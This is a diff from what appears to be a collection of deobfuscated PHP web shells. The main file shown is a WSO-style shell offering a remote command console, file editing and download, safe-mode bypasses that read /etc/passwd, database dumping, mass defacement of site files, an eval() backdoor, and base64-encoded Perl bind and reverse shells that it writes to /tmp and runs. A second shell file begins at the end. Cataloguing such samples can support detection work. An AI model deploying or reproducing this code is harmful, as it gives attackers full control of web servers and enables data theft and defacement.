' . htmlspecialchars($f['name']) : 'g(\'FilesMan\',\'' . $f['path'] . '\');">[ ' . htmlspecialchars($f['name']) . ' ]') . '' . (($f['type'] == 'file') ? wsoViewSize($f['size']) : $f['type']) . '' . $f['modify'] . '' . $f['owner'] . '/' . $f['group'] . '' . $f['perms'] . 'R T' . (($f['type'] == 'file') ? ' E D' : '') . '
+ + + +  
"; + wsoFooter(); + } + function actionStringTools() { + if (!function_exists('hex2bin')) { + function hex2bin($p) { + return decbin(hexdec($p)); + } + } + if (!function_exists('binhex')) { + function binhex($p) { + return dechex(bindec($p)); + } + } + if (!function_exists('hex2ascii')) { + function hex2ascii($p) { + $r = ''; + for ($i = 0;$i < strLen($p);$i+= 2) { + $r.= chr(hexdec($p[$i] . $p[$i + 1])); + } + return $r; + } + } + if (!function_exists('ascii2hex')) { + function ascii2hex($p) { + $r = ''; + for ($i = 0;$i < strlen($p);++$i) $r.= sprintf('%02X', ord($p[$i])); + return strtoupper($r); + } + } + if (!function_exists('full_urlencode')) { + function full_urlencode($p) { + $r = ''; + for ($i = 0;$i < strlen($p);++$i) $r.= '%' . dechex(ord($p[$i])); + return strtoupper($r); + } + } + $stringTools = array('Base64 encode' => 'base64_encode', 'Base64 decode' => 'base64_decode', 'Url encode' => 'urlencode', 'Url decode' => 'urldecode', 'Full urlencode' => 'full_urlencode', 'md5 hash' => 'md5', 'sha1 hash' => 'sha1', 'crypt' => 'crypt', 'CRC32' => 'crc32', 'ASCII to HEX' => 'ascii2hex', 'HEX to ASCII' => 'hex2ascii', 'HEX to DEC' => 'hexdec', 'HEX to BIN' => 'hex2bin', 'DEC to HEX' => 'dechex', 'DEC to BIN' => 'decbin', 'BIN to HEX' => 'binhex', 'BIN to DEC' => 'bindec', 'String to lower case' => 'strtolower', 'String to upper case' => 'strtoupper', 'Htmlspecialchars' => 'htmlspecialchars', 'String length' => 'strlen',); + if (isset($_POST['ajax'])) { + $_SESSION[$_SERVER['HTTP_HOST'] . 'ajax'] = true; + ob_start(); + if (in_array($_POST['p1'], $stringTools)) echo $_POST['p1']($_POST['p2']); + $temp = "document.getElementById('strOutput').style.display='';document.getElementById('strOutput').innerHTML='" . addcslashes(htmlspecialchars(ob_get_clean()), " + \'") . "'; +"; + echo strlen($temp), " +", $temp; + exit; + } + wsoHeader(); + echo '

String conversions

'; + if (empty($_POST['ajax']) && !empty($_POST['p1'])) $_SESSION[$_SERVER['HTTP_HOST'] . 'ajax'] = false; + echo "
send using AJAX
";
+                                                if (!empty($_POST['p1'])) {
+                                                    if (in_array($_POST['p1'], $stringTools)) echo htmlspecialchars($_POST['p1']($_POST['p2']));
+                                                }
+                                                echo "

Search text in files:

+
+ + + + +
Text:
Path:
Name:
"; + function wsoRecursiveGlob($path) { + if (substr($path, -1) != '/') $path.= '/'; + $paths = @array_unique(@array_merge(@glob($path . $_POST['p3']), @glob($path . '*', GLOB_ONLYDIR))); + if (is_array($paths) && @count($paths)) { + foreach ($paths as $item) { + if (@is_dir($item)) { + if ($path != $item) wsoRecursiveGlob($item); + } else { + if (@strpos(@file_get_contents($item), @$_POST['p2']) !== false) echo "" . htmlspecialchars($item) . "
"; + } + } + } + } + if (@$_POST['p3']) wsoRecursiveGlob($_POST['c']); + echo "

Search for hash:

+
+
+
+
+
+
+
+
"; + wsoFooter(); + } + function actionFilesTools() { + if (isset($_POST['p1'])) $_POST['p1'] = urldecode($_POST['p1']); + if (@$_POST['p2'] == 'download') { + if (@is_file($_POST['p1']) && @is_readable($_POST['p1'])) { + ob_start("ob_gzhandler", 4096); + header("Content-Disposition: attachment; filename=" . basename($_POST['p1'])); + if (function_exists("mime_content_type")) { + $type = @mime_content_type($_POST['p1']); + header("Content-Type: " . $type); + } + $fp = @fopen($_POST['p1'], "r"); + if ($fp) { + while (!@feof($fp)) echo @fread($fp, 1024); + fclose($fp); + } + } + exit; + } + if (@$_POST['p2'] == 'mkfile') { + if (!file_exists($_POST['p1'])) { + $fp = @fopen($_POST['p1'], 'w'); + if ($fp) { + $_POST['p2'] = "edit"; + fclose($fp); + } + } + } + wsoHeader(); + echo '

File tools

'; + if (!file_exists(@$_POST['p1'])) { + echo 'File not exists'; + wsoFooter(); + return; + } + $uid = @posix_getpwuid(@fileowner($_POST['p1'])); + if (!$uid) { + $uid['name'] = @fileowner($_POST['p1']); + $gid['name'] = @filegroup($_POST['p1']); + } else $gid = @posix_getgrgid(@filegroup($_POST['p1'])); + echo 'Name: ' . htmlspecialchars(@basename($_POST['p1'])) . ' Size: ' . (is_file($_POST['p1']) ? wsoViewSize(filesize($_POST['p1'])) : '-') . ' Permission: ' . wsoPermsColor($_POST['p1']) . ' Owner/Group: ' . $uid['name'] . '/' . $gid['name'] . '
'; + echo 'Create time: ' . date('Y-m-d H:i:s', filectime($_POST['p1'])) . ' Access time: ' . date('Y-m-d H:i:s', fileatime($_POST['p1'])) . ' Modify time: ' . date('Y-m-d H:i:s', filemtime($_POST['p1'])) . '

'; + if (empty($_POST['p2'])) $_POST['p2'] = 'view'; + if (is_file($_POST['p1'])) $m = array('View', 'Highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 'Rename', 'Touch'); + else $m = array('Chmod', 'Rename', 'Touch'); + foreach ($m as $v) echo '' . ((strtolower($v) == @$_POST['p2']) ? '[ ' . $v . ' ]' : $v) . ' '; + echo '

'; + switch ($_POST['p2']) { + case 'view': + echo '
';
+                                                        $fp = @fopen($_POST['p1'], 'r');
+                                                        if ($fp) {
+                                                            while (!@feof($fp)) echo htmlspecialchars(@fread($fp, 1024));
+                                                            @fclose($fp);
+                                                        }
+                                                        echo '
'; + break; + case 'highlight': + if (@is_readable($_POST['p1'])) { + echo '
'; + $code = @highlight_file($_POST['p1'], true); + echo str_replace(array(''), array(''), $code) . '
'; + } + break; + case 'chmod': + if (!empty($_POST['p3'])) { + $perms = 0; + for ($i = strlen($_POST['p3']) - 1;$i >= 0;--$i) $perms+= (int)$_POST['p3'][$i] * pow(8, (strlen($_POST['p3']) - $i - 1)); + if (!@chmod($_POST['p1'], $perms)) echo 'Can\'t set permissions!
'; + } + clearstatcache(); + echo '
'; + break; + case 'edit': + if (!is_writable($_POST['p1'])) { + echo 'File isn\'t writeable'; + break; + } + if (!empty($_POST['p3'])) { + $time = @filemtime($_POST['p1']); + $_POST['p3'] = substr($_POST['p3'], 1); + $fp = @fopen($_POST['p1'], "w"); + if ($fp) { + @fwrite($fp, $_POST['p3']); + @fclose($fp); + echo 'Saved!
'; + @touch($_POST['p1'], $time, $time); + } + } + echo '
'; + break; + case 'hexdump': + $c = @file_get_contents($_POST['p1']); + $n = 0; + $h = array('00000000
', '', ''); + $len = strlen($c); + for ($i = 0;$i < $len;++$i) { + $h[1].= sprintf('%02X', ord($c[$i])) . ' '; + switch (ord($c[$i])) { + case 0: + $h[2].= ' '; + break; + case 9: + $h[2].= ' '; + break; + case 10: + $h[2].= ' '; + break; + case 13: + $h[2].= ' '; + break; + default: + $h[2].= $c[$i]; + break; + } + $n++; + if ($n == 32) { + $n = 0; + if ($i + 1 < $len) { + $h[0].= sprintf('%08X', $i + 1) . '
'; + } + $h[1].= '
'; + $h[2].= " +"; + } + } + echo '
' . $h[0] . '
' . $h[1] . '
' . htmlspecialchars($h[2]) . '
'; + break; + case 'rename': + if (!empty($_POST['p3'])) { + if (!@rename($_POST['p1'], $_POST['p3'])) echo 'Can\'t rename!
'; + else die(''); + } + echo '
'; + break; + case 'touch': + if (!empty($_POST['p3'])) { + $time = strtotime($_POST['p3']); + if ($time) { + if (!touch($_POST['p1'], $time, $time)) echo 'Fail!'; + else echo 'Touched!'; + } else echo 'Bad time format!'; + } + clearstatcache(); + echo '
'; + break; + } + echo '
'; + wsoFooter(); + } + function actionSafeMode() { + $temp = ''; + ob_start(); + switch ($_POST['p1']) { + case 1: + $temp = @tempnam($test, 'cx'); + if (@copy("compress.zlib://" . $_POST['p2'], $temp)) { + echo @file_get_contents($temp); + unlink($temp); + } else echo 'Sorry... Can\'t open file'; + break; + case 2: + $files = glob($_POST['p2'] . '*'); + if (is_array($files)) foreach ($files as $filename) echo $filename . " +"; + break; + case 3: + $ch = curl_init("file://" . $_POST['p2'] . "" . preg_replace('!\(\d+\)\s.*!', '', __FILE__)); + curl_exec($ch); + break; + case 4: + ini_restore("safe_mode"); + ini_restore("open_basedir"); + include ($_POST['p2']); + break; + case 5: + for (;$_POST['p2'] <= $_POST['p3'];$_POST['p2']++) { + $uid = @posix_getpwuid($_POST['p2']); + if ($uid) echo join(':', $uid) . " +"; + } + break; + } + $temp = ob_get_clean(); + wsoHeader(); + echo '

Safe mode bypass

'; + echo 'Copy (read file)

Glob (list dir)

Curl (read file)

Ini_restore (read file)

Posix_getpwuid ("Read" /etc/passwd)
From
To
'; + if ($temp) echo '
' . htmlspecialchars($temp) . '
'; + echo '
'; + wsoFooter(); + } + function actionConsole() { + if (isset($_POST['ajax'])) { + $_SESSION[$_SERVER['HTTP_HOST'] . 'ajax'] = true; + ob_start(); + echo "document.cf.cmd.value=''; +"; + $temp = @iconv($_POST['charset'], 'UTF-8', addcslashes(" +$ " . $_POST['p1'] . " +" . wsoEx($_POST['p1']), " + \'")); + if (preg_match("!.*cd\s+([^;]+)$!", $_POST['p1'], $match)) { + if (@chdir($match[1])) { + $GLOBALS['cwd'] = @getcwd(); + echo "document.mf.c.value='" . $GLOBALS['cwd'] . "';"; + } + } + echo "document.cf.output.value+='" . $temp . "';"; + echo "document.cf.output.scrollTop = document.cf.output.scrollHeight;"; + $temp = ob_get_clean(); + echo strlen($temp), " +", $temp; + exit; + } + wsoHeader(); + echo ""; + echo '

Console

send using AJAX
'; + echo '
'; + wsoFooter(); + } + function actionSelfRemove() { + if ($_POST['p1'] == 'yes') if (@unlink(preg_replace('!\(\d+\)\s.*!', '', __FILE__))) die('Shell has been removed'); + else echo 'unlink error!'; + if ($_POST['p1'] != 'yes') wsoHeader(); + echo '

Suicide

Really want to remove the shell?
Yes
'; + wsoFooter(); + } + //** updates + function clear_fill($filo, $index) { + if (file_exists($filo)) { + $handle = fopen($filo, 'w'); + fwrite($handle, ''); + fwrite($handle, $index); + fclose($handle); + } + } + ///////// + function do_it() { + global $dir, $index; + chdir($dir); + $me = str_replace(dirname(__FILE__) . '/', '', __FILE__); + $filos = scandir($dir); + $notallow = array(".htaccess", "error_log", "_vti_inf.html", "_private", "_vti_bin", "_vti_cnf", "_vti_log", "_vti_pvt", "_vti_txt", "cgi-bin", ".contactemail", ".cpanel", ".fantasticodata", ".htpasswds", ".lastlogin", "access-logs", "cpbackup-exclude-used-by-backup.conf", ".cgi_auth", ".disk_usage", ".statspwd", "..", "."); + sort($filos); + $n = 0; + echo "
"; + echo "
"; + echo "

$n File Detected


"; + } + ////////////////////////////// + function ListFiles($dirall) { + if ($dh = opendir($dirall)) { + $filos = Array(); + $inner_files = Array(); + $me = str_replace(dirname(__FILE__) . '/', '', __FILE__); + $notallow = array($me, ".htaccess", "error_log", "_vti_inf.html", "_private", "_vti_bin", "_vti_cnf", "_vti_log", "_vti_pvt", "_vti_txt", "cgi-bin", ".contactemail", ".cpanel", ".fantasticodata", ".htpasswds", ".lastlogin", "access-logs", "cpbackup-exclude-used-by-backup.conf", ".cgi_auth", ".disk_usage", ".statspwd", "Thumbs.db"); + while ($filo = readdir($dh)) { + if ($filo != "." && $filo != ".." && $filo[0] != '.' && !in_array($filo, $notallow)) { + if (is_dir($dirall . "/" . $filo)) { + $inner_files = ListFiles($dirall . "/" . $filo); + if (is_array($inner_files)) $filos = array_merge($filos, $inner_files); + } else { + array_push($filos, $dirall . "/" . $filo); + } + } + } + closedir($dh); + return $filos; + } + } + ////////////////////////////////////////// + function do_it_all() { + global $index; + $dirall = $_POST['dir']; + echo "
"; + $key = $key + 1; + echo "

$key File Detected


"; + } + //////// + function actionMass() { + wsoHeader(); + echo "

Mass Defeace All Files

+

+ Index Code Here :
+

+ Main Dir : + | Options : + +
"; + if (isset($_POST['p1'])) { + if ($_POST['indexit']) { + if ($_POST['option'] == "Only for Selected Folder") { + do_it(); + } elseif ($_POST['option'] == "For all Sub Folders") { + do_it_all(); + } else { + echo "Please select one option to work on it !!"; + } + } + } + wsoFooter(); + } + function actionDomain() { + wsoHeader(); + echo "

Get All Server Domains

"; + $d0mains = @file("/etc/named.conf"); + if (!$d0mains) { + echo "
Can't ReaD -> [/etc/named.conf]"; + } else { + echo " +"; + foreach ($d0mains as $d0main) { + if (eregi("zone", $d0main)) { + preg_match_all('#zone "(.*)"#', $d0main, $domains); + flush(); + if (strlen(trim($domains[1][0])) > 2) { + $user = posix_getpwuid(@fileowner("/etc/valiases/" . $domains[1][0])); + echo ""; + flush(); + } + } + } + echo "
DomainUser
" . $domains[1][0] . "" . $user['name'] . "
+

"; + } + wsoFooter(); + } + function actionSql() { + class DbClass { + var $type; + var $link; + var $res; + function DbClass($type) { + $this->type = $type; + } + function connect($host, $user, $pass, $dbname) { + switch ($this->type) { + case 'mysql': + if ($this->link = @mysql_connect($host, $user, $pass, true)) return true; + break; + case 'pgsql': + $host = explode(':', $host); + if (!$host[1]) $host[1] = 5432; + if ($this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname")) return true; + break; + } + return false; + } + function selectdb($db) { + switch ($this->type) { + case 'mysql': + if (@mysql_select_db($db)) return true; + break; + } + return false; + } + function query($str) { + switch ($this->type) { + case 'mysql': + return $this->res = @mysql_query($str); + break; + case 'pgsql': + return $this->res = @pg_query($this->link, $str); + break; + } + return false; + } + function fetch() { + $res = func_num_args() ? func_get_arg(0) : $this->res; + switch ($this->type) { + case 'mysql': + return @mysql_fetch_assoc($res); + break; + case 'pgsql': + return @pg_fetch_assoc($res); + break; + } + return false; + } + function listDbs() { + switch ($this->type) { + case 'mysql': + return $this->res = @mysql_list_dbs($this->link); + break; + case 'pgsql': + return $this->res = $this->query("SELECT datname FROM pg_database"); + break; + } + return false; + } + function listTables() { + switch ($this->type) { + case 'mysql': + return $this->res = $this->query('SHOW TABLES'); + break; + case 'pgsql': + return $this->res = $this->query("select table_name from information_schema.tables where (table_schema != 'information_schema' AND table_schema != 'pg_catalog') or table_name = 'pg_shadow'"); + break; + } + return false; + } + function error() { + switch ($this->type) { + case 'mysql': + return @mysql_error($this->link); + break; + case 'pgsql': + return @pg_last_error($this->link); + break; + } + return false; + } + function setCharset($str) { + switch ($this->type) { + case 'mysql': + if (function_exists('mysql_set_charset')) return @mysql_set_charset($str, $this->link); + else $this->query('SET CHARSET ' . $str); + break; + case 'pgsql': + return @pg_set_client_encoding($this->link, $str); + break; + } + return false; + } + function loadFile($str) { + switch ($this->type) { + case 'mysql': + return $this->fetch($this->query("SELECT LOAD_FILE('" . addslashes($str) . "') as file")); + break; + case 'pgsql': + $this->query("CREATE TABLE wso2(file text);COPY wso2 FROM '" . addslashes($str) . "';select file from wso2;"); + $r = array(); + while ($i = $this->fetch()) $r[] = $i['file']; + $this->query('drop table wso2'); + return array('file' => implode(" +", $r)); + break; + } + return false; + } + function dump($table) { + switch ($this->type) { + case 'mysql': + $res = $this->query('SHOW CREATE TABLE `' . $table . '`'); + $create = mysql_fetch_array($res); + echo $create[1] . "; + +"; + $this->query('SELECT * FROM `' . $table . '`'); + while ($item = $this->fetch()) { + $columns = array(); + foreach ($item as $k => $v) { + $item[$k] = "'" . @mysql_real_escape_string($v) . "'"; + $columns[] = "`" . $k . "`"; + } + echo 'INSERT INTO `' . $table . '` (' . implode(", ", $columns) . ') VALUES (' . implode(", ", $item) . ');' . " +"; + } + break; + case 'pgsql': + $this->query('SELECT * FROM ' . $table); + while ($item = $this->fetch()) { + $columns = array(); + foreach ($item as $k => $v) { + $item[$k] = "'" . addslashes($v) . "'"; + $columns[] = $k; + } + echo 'INSERT INTO ' . $table . ' (' . implode(", ", $columns) . ') VALUES (' . implode(", ", $item) . ');' . " +"; + } + break; + } + return false; + } + }; + $db = new DbClass($_POST['type']); + if (@$_POST['p2'] == 'download') { + ob_start("ob_gzhandler", 4096); + $db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']); + $db->selectdb($_POST['sql_base']); + header("Content-Disposition: attachment; filename=dump.sql"); + header("Content-Type: text/plain"); + foreach ($_POST['tbl'] as $v) $db->dump($v); + exit; + } + wsoHeader(); + echo " +

Sql browser

+
+ + + + + + + + +
TypeHostLoginPasswordDatabase
"; + $tmp = ""; + if (isset($_POST['sql_host'])) { + if ($db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base'])) { + switch ($_POST['charset']) { + case "Windows-1251": + $db->setCharset('cp1251'); + break; + case "UTF-8": + $db->setCharset('utf8'); + break; + case "KOI8-R": + $db->setCharset('koi8r'); + break; + case "KOI8-U": + $db->setCharset('koi8u'); + break; + case "cp866": + $db->setCharset('cp866'); + break; + } + $db->listDbs(); + echo "'; + } else echo $tmp; + } else echo $tmp; + echo "
+ "; + if (isset($db) && $db->link) { + echo "
"; + if (!empty($_POST['sql_base'])) { + $db->selectdb($_POST['sql_base']); + echo ""; + } + echo "
Tables:

"; + $tbls_res = $db->listTables(); + while ($item = $db->fetch($tbls_res)) { + list($key, $value) = each($item); + $n = $db->fetch($db->query('SELECT COUNT(*) as n FROM ' . $value . '')); + $value = htmlspecialchars($value); + echo " " . $value . " (" . $n['n'] . ")
"; + } + echo "
"; + if (@$_POST['p1'] == 'select') { + $_POST['p1'] = 'query'; + $db->query('SELECT COUNT(*) as n FROM ' . $_POST['p2'] . ''); + $num = $db->fetch(); + $num = $num['n']; + echo "" . $_POST['p2'] . " ($num) "; + for ($i = 0;$i < ($num / 30);$i++) if ($i != (int)$_POST['p3']) echo "", ($i + 1), " "; + else echo ($i + 1), " "; + if ($_POST['type'] == 'pgsql') $_POST['p3'] = 'SELECT * FROM ' . $_POST['p2'] . ' LIMIT 30 OFFSET ' . ($_POST['p3'] * 30); + else $_POST['p3'] = 'SELECT * FROM `' . $_POST['p2'] . '` LIMIT ' . ($_POST['p3'] * 30) . ',30'; + echo "

"; + } + if ((@$_POST['p1'] == 'query') && !empty($_POST['p3'])) { + $db->query(@$_POST['p3']); + if ($db->res !== false) { + $title = false; + echo ''; + $line = 1; + while ($item = $db->fetch()) { + if (!$title) { + echo ''; + foreach ($item as $key => $value) echo ''; + reset($item); + $title = true; + echo ''; + $line = 2; + } + echo ''; + $line = $line == 1 ? 2 : 1; + foreach ($item as $key => $value) { + if ($value == null) echo ''; + else echo ''; + } + echo ''; + } + echo '
' . $key . '
null' . nl2br(htmlspecialchars($value)) . '
'; + } else { + echo '
Error: ' . htmlspecialchars($db->error()) . '
'; + } + } + echo "

"; + echo "

Load file
"; + if (@$_POST['p1'] == 'loadfile') { + $file = $db->loadFile($_POST['p2']); + echo '
' . htmlspecialchars($file['file']) . '
'; + } + } + echo '
'; + wsoFooter(); + } + function actionNetwork() { + wsoHeader(); + $back_connect_p = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7"; + $bind_port_p = "IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0="; + echo "

Network tools

+
+ Bind port to /bin/sh [perl]
+ Port: +
+
+ Back-connect [perl]
+ Server: Port: +

"; + if (isset($_POST['p1'])) { + function cf($f, $t) { + $w = @fopen($f, "w") or @function_exists('file_put_contents'); + if ($w) { + @fwrite($w, base64_decode($t)); + @fclose($w); + } + } + if ($_POST['p1'] == 'bpp') { + cf("/tmp/bp.pl", $bind_port_p); + $out = wsoEx("perl /tmp/bp.pl " . $_POST['p2'] . " 1>/dev/null 2>&1 &"); + echo "
$out
+" . wsoEx("ps aux | grep bp.pl") . "
"; + } + if ($_POST['p1'] == 'bcp') { + cf("/tmp/bc.pl", $back_connect_p); + $out = wsoEx("perl /tmp/bc.pl " . $_POST['p2'] . " " . $_POST['p3'] . " 1>/dev/null 2>&1 &"); + echo "
$out
+" . wsoEx("ps aux | grep bc.pl") . "
"; + } + } + echo '
'; + wsoFooter(); + } + function actionRC() { + if (!@$_POST['p1']) { + $a = array("uname" => php_uname(), "php_version" => phpversion(), "wso_version" => VERSION, "safemode" => @ini_get('safe_mode')); + echo serialize($a); + } else { + eval($_POST['p1']); + } + } + if (empty($_POST['a'])) if (isset($default_action) && function_exists('action' . $default_action)) $_POST['a'] = $default_action; + else $_POST['a'] = 'SecInfo'; + if (!empty($_POST['a']) && function_exists('action' . $_POST['a'])) call_user_func('action' . $_POST['a']); + exit; +?> \ No newline at end of file diff --git a/Deobfuscated/WebShell_b28355fd3547d109f06ed2e641179b98faf81170.php b/Deobfuscated/WebShell_b28355fd3547d109f06ed2e641179b98faf81170.php new file mode 100644 index 0000000..7f62a2d --- /dev/null +++ b/Deobfuscated/WebShell_b28355fd3547d109f06ed2e641179b98faf81170.php @@ -0,0 +1,1066 @@ +$v) { + if(!preg_match("/^\./", $v)) { + if(is_dir($dir . DS . $v) || !$dirs_only) { + if(!$writable || is_writeable($dir . DS . $v)) { + $content[] = $dir . DS . $v ; + } + } + } + if(!preg_match("/^\./", $v) && is_dir($dir . DS . $v)) { + if($maxdepth > 0) { + $__content = scandir_rec($dir . DS . $v, $dirs_only, $maxdepth-1, $writable, true) ; + if($__content) { + foreach($__content as $kk=>$vv) { + if(is_dir($dir . DS . $v) || !$dirs_only) { + if(!$writable || is_writeable($dir . DS . $vv)) { + $content[] = $vv ; + } + } + } + } + } + } + } + } + return $content ; +} + +function cust_function_exists($function) { + $disabled = explode(', ', ini_get('disable_functions')); + return !in_array($function, $disabled) && function_exists($function); +} + +function deleteDir($path) { + $path = (substr($path,-1)=='/') ? $path:$path.'/'; + $dh = opendir($path); + while ( ($item = readdir($dh) ) !== false) { + $item = $path.$item; + if ( (basename($item) == "..") || (basename($item) == ".") ) + continue; + if (is_dir($item)) { + deleteDir($item); + } elseif(is_file($item)) { + @unlink($item); + } + } + closedir($dh); + @rmdir($path); +} + +function smartCopy($source, $dest, $options=array('folderPermission'=>0777,'filePermission'=>0777)) { + $result=false; + + if (is_file($source)) { + if ($dest[strlen($dest)-1]=='/') { + if (!file_exists($dest)) { + cmfcDirectory::makeAll($dest,$options['folderPermission'],true); + } + $__dest=$dest."/".basename($source); + } else { + $__dest=$dest; + } + $result=copy($source, $__dest); + chmod($__dest,$options['filePermission']); + + } elseif(is_dir($source)) { + if ($dest[strlen($dest)-1]=='/') { + if ($source[strlen($source)-1]=='/') { + //Copy only contents + } else { + //Change parent itself and its contents + $dest=$dest.basename($source); + @mkdir($dest); + chmod($dest,$options['filePermission']); + } + } else { + if ($source[strlen($source)-1]=='/') { + //Copy parent directory with new name and all its content + @mkdir($dest,$options['folderPermission']); + chmod($dest,$options['filePermission']); + } else { + //Copy parent directory with new name and all its content + @mkdir($dest,$options['folderPermission']); + chmod($dest,$options['filePermission']); + } + } + + $dirHandle=opendir($source); + while($file=readdir($dirHandle)) + { + if($file!="." && $file!="..") + { + if(!is_dir($source."/".$file)) { + $__dest=$dest."/".$file; + } else { + $__dest=$dest."/".$file; + } + //echo "$source/$file ||| $__dest
"; + $result=smartCopy($source."/".$file, $__dest, $options); + } + } + closedir($dirHandle); + + } else { + $result=false; + } + return $result; + } + +class archive +{ + function archive($name) + { + $this->options = array ( + 'basedir' => ".", + 'name' => $name, + 'prepend' => "", + 'inmemory' => 0, + 'overwrite' => 0, + 'recurse' => 1, + 'storepaths' => 1, + 'followlinks' => 0, + 'level' => 3, + 'method' => 1, + 'sfx' => "", + 'type' => "", + 'comment' => "" + ); + $this->files = array (); + $this->exclude = array (); + $this->storeonly = array (); + $this->error = array (); + } + + function set_options($options) + { + foreach ($options as $key => $value) + $this->options[$key] = $value; + if (!empty ($this->options['basedir'])) + { + $this->options['basedir'] = str_replace("\\", "/", $this->options['basedir']); + $this->options['basedir'] = preg_replace("/\/+/", "/", $this->options['basedir']); + $this->options['basedir'] = preg_replace("/\/$/", "", $this->options['basedir']); + } + if (!empty ($this->options['name'])) + { + $this->options['name'] = str_replace("\\", "/", $this->options['name']); + $this->options['name'] = preg_replace("/\/+/", "/", $this->options['name']); + } + if (!empty ($this->options['prepend'])) + { + $this->options['prepend'] = str_replace("\\", "/", $this->options['prepend']); + $this->options['prepend'] = preg_replace("/^(\.*\/+)+/", "", $this->options['prepend']); + $this->options['prepend'] = preg_replace("/\/+/", "/", $this->options['prepend']); + $this->options['prepend'] = preg_replace("/\/$/", "", $this->options['prepend']) . "/"; + } + } + + function create_archive() + { + $this->make_list(); + + if ($this->options['inmemory'] == 0) + { + $pwd = getcwd(); + chdir($this->options['basedir']); + if ($this->options['overwrite'] == 0 && file_exists($this->options['name'] . ($this->options['type'] == "gzip" || $this->options['type'] == "bzip" ? ".tmp" : ""))) + { + $this->error[] = "File {$this->options['name']} already exists."; + chdir($pwd); + return 0; + } + else if ($this->archive = @fopen($this->options['name'] . ($this->options['type'] == "gzip" || $this->options['type'] == "bzip" ? ".tmp" : ""), "wb+")) + chdir($pwd); + else + { + $this->error[] = "Could not open {$this->options['name']} for writing."; + chdir($pwd); + return 0; + } + } + else + $this->archive = ""; + + switch ($this->options['type']) + { + case "zip": + if (!$this->create_zip()) + { + $this->error[] = "Could not create zip file."; + return 0; + } + break; + case "bzip": + if (!$this->create_tar()) + { + $this->error[] = "Could not create tar file."; + return 0; + } + if (!$this->create_bzip()) + { + $this->error[] = "Could not create bzip2 file."; + return 0; + } + break; + case "gzip": + if (!$this->create_tar()) + { + $this->error[] = "Could not create tar file."; + return 0; + } + if (!$this->create_gzip()) + { + $this->error[] = "Could not create gzip file."; + return 0; + } + break; + case "tar": + if (!$this->create_tar()) + { + $this->error[] = "Could not create tar file."; + return 0; + } + } + + if ($this->options['inmemory'] == 0) + { + fclose($this->archive); + if ($this->options['type'] == "gzip" || $this->options['type'] == "bzip") + unlink($this->options['basedir'] . "/" . $this->options['name'] . ".tmp"); + } + } + + function add_data($data) + { + if ($this->options['inmemory'] == 0) + fwrite($this->archive, $data); + else + $this->archive .= $data; + } + + function make_list() + { + if (!empty ($this->exclude)) + foreach ($this->files as $key => $value) + foreach ($this->exclude as $current) + if ($value['name'] == $current['name']) + unset ($this->files[$key]); + if (!empty ($this->storeonly)) + foreach ($this->files as $key => $value) + foreach ($this->storeonly as $current) + if ($value['name'] == $current['name']) + $this->files[$key]['method'] = 0; + unset ($this->exclude, $this->storeonly); + } + + function add_files($list) + { + $temp = $this->list_files($list); + foreach ($temp as $current) + $this->files[] = $current; + } + + function exclude_files($list) + { + $temp = $this->list_files($list); + foreach ($temp as $current) + $this->exclude[] = $current; + } + + function store_files($list) + { + $temp = $this->list_files($list); + foreach ($temp as $current) + $this->storeonly[] = $current; + } + + function list_files($list) + { + if (!is_array ($list)) + { + $temp = $list; + $list = array ($temp); + unset ($temp); + } + + $files = array (); + + $pwd = getcwd(); + chdir($this->options['basedir']); + + foreach ($list as $current) + { + $current = str_replace("\\", "/", $current); + $current = preg_replace("/\/+/", "/", $current); + $current = preg_replace("/\/$/", "", $current); + if (strstr($current, "*")) + { + $regex = preg_replace("/([\\\^\$\.\[\]\|\(\)\?\+\{\}\/])/", "\\\\\\1", $current); + $regex = str_replace("*", ".*", $regex); + $dir = strstr($current, "/") ? substr($current, 0, strrpos($current, "/")) : "."; + 